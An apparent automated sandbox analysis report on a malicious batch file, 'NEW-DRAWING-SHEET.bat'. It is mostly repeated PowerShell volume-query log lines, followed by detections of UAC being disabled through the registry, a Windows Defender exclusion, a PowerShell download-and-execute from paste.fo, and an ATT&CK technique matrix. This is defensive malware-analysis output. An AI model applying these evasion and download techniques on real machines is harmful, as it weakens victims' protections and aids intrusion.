          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Disables UAC (registry)
          Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information11
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		11
          Scripting          		11
          Process Injection          		11
          Masquerading          		OS Credential Dumping111
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		31
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell          		Logon Script (Windows)Logon Script (Windows)1
          Modify Registry          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook31
          Virtualization/Sandbox Evasion          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Process Injection          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Obfuscated Files or Information          		Cached Domain Credentials22
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582348 Sample: NEW-DRAWING-SHEET.bat Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 48 paste.fo 2->48 70 Multi AV Scanner detection for submitted file 2->70 72 Yara detected Powershell download and execute 2->72 74 Sigma detected: PowerShell DownloadFile 2->74 76 4 other signatures 2->76 10 cmd.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 82 Suspicious powershell command line found 10->82 84 Uses cmd line tools excessively to alter registry or file data 10->84 86 Tries to download and execute files (via powershell) 10->86 88 2 other signatures 10->88 16 cmd.exe 14 10->16         started        19 conhost.exe 10->19         started        60 127.0.0.1 unknown unknown 13->60 signatures6 process7 signatures8 62 Suspicious powershell command line found 16->62 64 Uses cmd line tools excessively to alter registry or file data 16->64 66 Tries to download and execute files (via powershell) 16->66 68 Excessive usage of taskkill to terminate processes 16->68 21 powershell.exe 18 16->21         started        23 powershell.exe 14 16 16->23         started        27 chrome.exe 10 16->27         started        29 16 other processes 16->29 process9 dnsIp10 31 cmd.exe 1 21->31         started        54 paste.fo 172.67.144.225, 443, 49730 CLOUDFLARENETUS United States 23->54 46 C:\Users\user\...\BatchByloadStartHid.bat, DOS 23->46 dropped 56 192.168.2.4, 138, 443, 49585 unknown unknown 27->56 58 239.255.255.250 unknown Reserved 27->58 34 chrome.exe 27->34         started        file11 process12 dnsIp13 90 Uses cmd line tools excessively to alter registry or file data 31->90 92 Adds a directory exclusion to Windows Defender 31->92 37 powershell.exe 22 31->37         started        40 reg.exe 1 31->40         started        42 powershell.exe 31->42         started        44 16 other processes 31->44 50 www.google.com 142.250.185.100, 443, 49744 GOOGLEUS United States 34->50 52 raw.githubusercontent.com 185.199.111.133, 443, 49731 FASTLYUS Netherlands 34->52 signatures14 process15 signatures16 78 Loading BitLocker PowerShell Module 37->78 80 